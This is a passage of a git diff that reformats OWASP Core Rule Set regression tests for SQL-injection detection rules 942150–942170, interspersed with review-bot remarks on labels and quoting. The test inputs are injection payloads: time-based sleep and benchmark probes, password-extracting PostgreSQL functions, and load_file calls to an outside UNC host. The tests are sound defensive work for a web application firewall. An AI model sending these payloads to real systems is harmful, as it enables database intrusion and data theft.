gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 16 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\foobar.txt\" or sleep(4) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\foobar.txt\" 
or sleep(4) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 17 desc: "SQLite 'json' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 18 desc: "SQLite 'json_valid' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 19 desc: "SQLite 'glob' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" - version: HTTP/1.0 - output: - log_contains: id "942150" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml index 1b938cf32..cd940dd78 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml 
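Review bot: Test 5 (`- test_id: 5` followed directly by `stages:`) is the only entry in this file without a `desc`, so a failure of that case reports no purpose; the format migration carried the gap over from the old `test_title: 942150-5` entry. Its payload `var=test')and (select*from(select(sleep(10)))d)--` is the same shape as tests 7 and 10, so `desc: "Advanced SQL injection"` would match its siblings. Separately, tests 4 and 15 are labelled "Advanced SQL injection"/"Advanced injection" although their payloads are JavaScript busy-wait functions (`(function(){...while(b-a<20000)...}())`), which reads as a time-based server-side JavaScript probe rather than SQL; a desc such as `desc: "Time-based injection using a JavaScript busy-wait"` would make the intent of those two cases clearer, assuming that is what the rule is meant to catch there.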
@@ -2,189 +2,188 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942151.yaml +rule_id: 942151 tests: - - test_title: 942151-1 + - test_id: 1 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'||(select extractvalue(xmltype('%tocob;" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 3 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 4 desc: "Simple injection using 'fetch_in_set'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=, FIND_IN_SET('22', Category )" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=, FIND_IN_SET('22', Category )" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 5 desc: "SQL injection using 'likelihood' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 6 desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 7 desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-8 + - input: + dest_addr: 127.0.0.1 + headers: + 
Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 8 desc: "SQL injection using PostgreSQL starts_with() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=starts_with(password,'a')::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=starts_with(password,'a')::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 9 desc: "SQL injection using PostgreSQL jsonb_pretty() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log: + 
expect_ids: [942151] + - test_id: 10 desc: "SQL injection using PostgreSQL json_build_object() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 11 desc: "SQL injection using unistr() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=unistr(password)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=unistr(password)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml index 6b2576b89..80057834e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml 
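Review bot: The desc of test 4 names a function that does not exist in the payload: it says `'fetch_in_set'` while the data is `var=, FIND_IN_SET('22', Category )`, so the label should be `desc: "Simple injection using 'find_in_set'"`. Tests 9 and 10 also carry a literal `...` inside the URI (`id=jsonb_pretty(...(1,password)::jsonb)::int` and `id=...(json_build_object(1,password)::jsonb)::int`), which looks like an elision copied from a write-up rather than part of the probe; if it is intentional, a one-line comment above each stage stating that the `...` stands for an elided outer expression and that only the named function must match would stop the next maintainer from "fixing" it.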
@@ -2,54 +2,53 @@ meta:
 author: "Franziska Bühler, azurit"
 description: Various SQL injection tests
- enabled: true
- name: 942152.yaml
+rule_id: 942152
 tests:
- - test_title: 942152-1
+ - test_id: 1
 desc: "SQL injection in request header User-Agent"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942152"
- - test_title: 942152-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942152]
+ - test_id: 2
 desc: "SQL injection in request header User-Agent"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942152"
- - test_title: 942152-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942152]
+ - test_id: 3
 desc: "SQL injection in request header User-Agent"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get"
- version: HTTP/1.0
- output:
- log_contains: id "942152"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942152]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
index 86811feb2..511fd3e00 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
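Review bot: The three `User-Agent` payloads are the only header values in these test files left as unquoted plain scalars, while every sibling test quotes its `User-Agent: "OWASP CRS test agent"`; a plain scalar that starts with a digit or carries `%`, `:` and `'` sequences is exactly the kind of value a YAML parser can re-type or truncate, so quote them, e.g. `User-Agent: "encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint"`. The three descs are also identical ("SQL injection in request header User-Agent") although test 2 exercises `starts_with(password, ...)` and tests 1 and 3 exercise `encode(lo_get(...), 'base64')::int`; following the wording the 942151 tests already use for `starts_with()`, `desc: "SQL injection in User-Agent header using PostgreSQL starts_with()"` and `desc: "SQL injection in User-Agent header using PostgreSQL lo_get()/encode()"` would tell a reader which case regressed.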
@@ -1,175 +1,173 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None - enabled: true - name: 942160.yaml +rule_id: 942160 tests: - - test_title: 942160-1 + - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?sql_table=sleep%28534543%29" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleEP(3)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleep(5000)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(2999/**/999,Md5(NoW()" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BEncHMARk(2999999,Md5(NoW('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENCHMARK(5000000,MD5(0x48416166)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(3000000,M%445(4)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: 
- Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 10 desc: "Detect blind SQLi attack in REQUEST_BASENAME. 
Issue #1904" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/if(now()=sysdate(),sleep(12),0)" - version: HTTP/1.0 - output: - log_contains: id "942160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/if(now()=sysdate(),sleep(12),0)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 6dff839b3..44ce44bdd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml 
@@ -1,71 +1,69 @@ --- meta: author: "Franziska Bühler, azurit" - description: None - enabled: true - name: 942170.yaml +rule_id: 942170 tests: - - test_title: 942170-1 + - test_id: 1 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942170] + - test_id: 2 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3B%20sleep%280%29" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3B%20sleep%280%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942170] + - test_id: 3 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" 
